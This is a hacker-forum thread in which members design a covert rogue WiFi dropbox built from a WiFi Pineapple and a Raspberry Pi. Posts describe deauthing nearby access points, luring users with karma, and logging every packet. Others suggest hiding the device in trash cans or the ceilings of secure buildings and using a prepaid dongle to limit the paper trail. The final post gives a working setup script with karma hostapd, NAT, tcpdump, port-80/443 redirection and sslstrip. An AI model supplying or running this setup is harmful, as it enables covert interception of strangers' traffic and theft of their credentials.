Jump to content

Wifi Pineapple/f-bomb


Sleven
 Share

Recommended Posts

Anyone building this yet, Wifi Pineapple/F-Bomb or maybe raspberry pi? Concept of taking a fairly cheap AP51 and interfacing it with a fairly cheap modified pogoplug. I need something I can drop and and pick up later for analysis (SSLStrip, driftnet etc...) I would be willing to fund some of this project if Hak5 would like to take this on.

http://www.geek.com/articles/chips/f-bomb-50-computer-is-designed-to-hack-secure-networks-20120131/

Link to comment
Share on other sites

I've said it a million times already, but a raspberry pineapple is a recipe for win. I'm all over this shit man.

The mark4, from what I understand, is a big step towards an all-in-one wifi pwnage box, but I have yet to determine (despite questioning darren and rest on these forums) if it has the horsepower to handle all the necessary tasks itself. Or will it still need a host computer (insert raspberry pi)?

So to copy/paste from the other 10 threads I've mentioned this in...my dream dropbox will:

Upon bootup connect to closest open wifihotspot, if no open hotspots exist, connect to sprints wimax network with 3g as backup (wimax for its no cap on data and speediness). It will then smtp me a message telling me its IP and that its connected and about to wtfpwn everything around it. Then it will rename its karma'd essid to either what I set it for before dropping it (targeted) or to the closest open wifi hotspot's name (coffeshop_wifi att_wifi etc), or default to "Free Wifi". It will start a tcpdump cap of everything on eth0 to external usb stick for later retrieval at pickup time or dial in via vpn/scp. It will then start karma. Then it will airdrop nuke every AP around it for 30 seconds or so and restart another airdrop-ng for 30 seconds every 5 minutes.

So its preventing anyone from getting on a legit wifi hotspot, its bringing all the boys to the yard with karma, and its logging every packet that anyone connected sends. Its also announcing itself to me with its IP so I can dial in and make any changes I might want to or grab the capture file over the air.

The more I think about it, perhaps the wimax should be the default provider of ICS to the pineapple, that way no one can deauth me, the attacker. Or sniff the traffic for that matter.

I anticipate doing this with a rasp pi with powered usb hub, an alfa 036H card, fat 32gb usb stick, and a sprint 4g usb dongle. Along with a pineapple of course. I'm still trying to source good omni antennas for this project, along with a big fat battery. I'm also working on ideas for incognito cases...something that wouldn't look out of place - any ideas?

So yeah, I've put some thought and effort into this (already begun scripting it) but would surely appreciate collaboration from any and all on these forums. The F-BOMB ain't got shit on the pineapple baby! And DARPA ain't got shit on hak5!

telot

Link to comment
Share on other sites

I've said it a million times already, but a raspberry pineapple is a recipe for win. I'm all over this shit man.

The mark4, from what I understand, is a big step towards an all-in-one wifi pwnage box, but I have yet to determine (despite questioning darren and rest on these forums) if it has the horsepower to handle all the necessary tasks itself. Or will it still need a host computer (insert raspberry pi)?

So to copy/paste from the other 10 threads I've mentioned this in...my dream dropbox will:

Upon bootup connect to closest open wifihotspot, if no open hotspots exist, connect to sprints wimax network with 3g as backup (wimax for its no cap on data and speediness). It will then smtp me a message telling me its IP and that its connected and about to wtfpwn everything around it. Then it will rename its karma'd essid to either what I set it for before dropping it (targeted) or to the closest open wifi hotspot's name (coffeshop_wifi att_wifi etc), or default to "Free Wifi". It will start a tcpdump cap of everything on eth0 to external usb stick for later retrieval at pickup time or dial in via vpn/scp. It will then start karma. Then it will airdrop nuke every AP around it for 30 seconds or so and restart another airdrop-ng for 30 seconds every 5 minutes.

So its preventing anyone from getting on a legit wifi hotspot, its bringing all the boys to the yard with karma, and its logging every packet that anyone connected sends. Its also announcing itself to me with its IP so I can dial in and make any changes I might want to or grab the capture file over the air.

The more I think about it, perhaps the wimax should be the default provider of ICS to the pineapple, that way no one can deauth me, the attacker. Or sniff the traffic for that matter.

I anticipate doing this with a rasp pi with powered usb hub, an alfa 036H card, fat 32gb usb stick, and a sprint 4g usb dongle. Along with a pineapple of course. I'm still trying to source good omni antennas for this project, along with a big fat battery. I'm also working on ideas for incognito cases...something that wouldn't look out of place - any ideas?

So yeah, I've put some thought and effort into this (already begun scripting it) but would surely appreciate collaboration from any and all on these forums. The F-BOMB ain't got shit on the pineapple baby! And DARPA ain't got shit on hak5!

telot

I thought about 3G dongle a few days back. I was testing out tethering my androids connection with the pineapple for foot/vehicle pentest. The price of all the hardware being snatched would suck. Not to mention ensure you use a prepaid 3G for a harder paper trail. As far as omni directional antenna I would build an antenna similar to the link below. Just have to cut it to wavelength using a vswr formula. Been a bit since I have had to deal directly with the RF world. I am used to tactical radios that deal with different freqs. As far as enclosures, I stopped by Home Depot took a look at some electrical termination boxes. I have also considered plaster casting a hollow rock. Have a few more ideas but hopefully this gets your wheels turning.

http://www.hobbyking.com/hobbyking/store/uh_viewItem.asp?idProduct=10896

Link to comment
Share on other sites

  • 1 year later...

win on this. I began scripting this project a few weeks ago, as far as a case goes, right now I've just got the raspi sitting on top of the pelican case with the pineapple, anker usb hub, cruzer & stripped 4g modem all stuffed inside (tight as hell i might add).

Link to comment
Share on other sites

I've already loaded karma onto the pineapple, using a AWUS036NHA as the primary karma radio and it works like a charm. You don't get the fancy UI interface, or the infusions, but I don't use those much anyways. I still prefer to use the purpose-built pineapple for pineappling, but building my own out of a raspberry pi was a fun exercise. I had never played with dnsmasq and hostapd, so it was a great learning experience that I would highly recommend for anyone, but nothing can beat the pineapple at doing what it does best :)

telot

Link to comment
Share on other sites

If you can get 2 pineapples that actually stay working you can build a very nice neinsager piggy-back,and use second pineapple as a foundation for launching deauth,and logging,leaving resources on pineapple 1 fairly low...

I am BIG on enclosures right now:

Trash can with false bottom.

Power meters

An old boot <~great for alleys and large city applications

Books

Other non-intrusive electronics - shell only

I have lived in some very big cities, and I can tell ya that drug dealers in, like, Oakland, for example, keep stuff in old burgerking coffee cups or mcdonalds paper bags. They tell you what to grab from the gutter.

NOONE picks up trash...

..so fairly safe.

My favorite?

Drop ceilings, drop ceilings, drop ceilings. Even secure buildings have restrooms, which almost always have a drop ceiling. My battery lasts 26 hrs plus...

Link to comment
Share on other sites

If you can get 2 pineapples that actually stay working you can build a very nice neinsager piggy-back,and use second pineapple as a foundation for launching deauth,and logging,leaving resources on pineapple 1 fairly low...

I am BIG on enclosures right now:

Trash can with false bottom.

Power meters

An old boot <~great for alleys and large city applications

Books

Other non-intrusive electronics - shell only

I have lived in some very big cities, and I can tell ya that drug dealers in, like, Oakland, for example, keep stuff in old burgerking coffee cups or mcdonalds paper bags. They tell you what to grab from the gutter.

NOONE picks up trash...

..so fairly safe.

My favorite?

Drop ceilings, drop ceilings, drop ceilings. Even secure buildings have restrooms, which almost always have a drop ceiling. My battery lasts 26 hrs plus...

And how you give Internet to the pineapple? When you live it or you live it with usb hub? It will be interesting to see your config.

Link to comment
Share on other sites

Telot, did you get dhcp server running on the raspberry pi?

Yes

And how you give Internet to the pineapple? When you live it or you live it with usb hub? It will be interesting to see your config.

Easily with a 3G dongle or (what I prefer) a 3G cellular router.

@ telot, did you follow a tutorial for the Pi ? or are all the packages available ?

If I recall, I just followed digininja's instructions on his site. They're not pi-specific, so I had to do some tweaking...I can fire it up and report back the exact config if you want.

telot

Edited by telot
Link to comment
Share on other sites

Hey Zete: Heres the script I used to download the karma-patched hostapd.

#/bin/sh
# bootup Module setup script
#leave this echo
echo "## Apt-getting ##"
apt-get install libnl-dev -y
#leave this echo
echo "## Compiling ##"
if ! which /usr/local/bin/hostapd > /dev/null; then
echo "### Installing hostapd-karma ###" >>
cd /tmp
tar -jvxf hostapd-1.0-karma.tar.bz2
cd hostapd-1.0-karma/hostapd
make && make install
cd ~
hostapd -vv
echo "### Installed hostapd-karma ###"
fi
#leave this echo
echo "## Final Commands ##"
# Enjoy - Leave me at Bottom - EOF
Go into /etc/dnsmasq.conf and make sure interface=wlan0 and then uncomment/add this line:
dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h
And you may need to change some things around in the patched karma hostapd.conf file as well. I had to change my drivers to match my card, and changed the ssid to be broadcasted.
interface=wlan0
driver=nl80211
ssid=FreeInternet
channel=1
Then I made up a quick n dirty telotscript to start it all up:
#!/bin/sh
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -j MASQUERADE
cd /root/hostapd-1.0-karma/hostapd/
./hostapd -B /root/hostapd-1.0-karma/hostapd/hostapd.conf
tcpdump -i wlan0 -w /root/cap.pcap -n net 192.168.0.0/24 &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
sslstrip -w /root/sslstrip.log &
Theres nothing fancy about this install, theres no gui, theres no dancing fruit, but it does work and works well. Please keep in mind I did this several months ago and may have missed something. So if the instructions are really bad (and they very well could be haha) let me know and I can do a proper write up. But I think this should get you going in the right direction.
telot
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...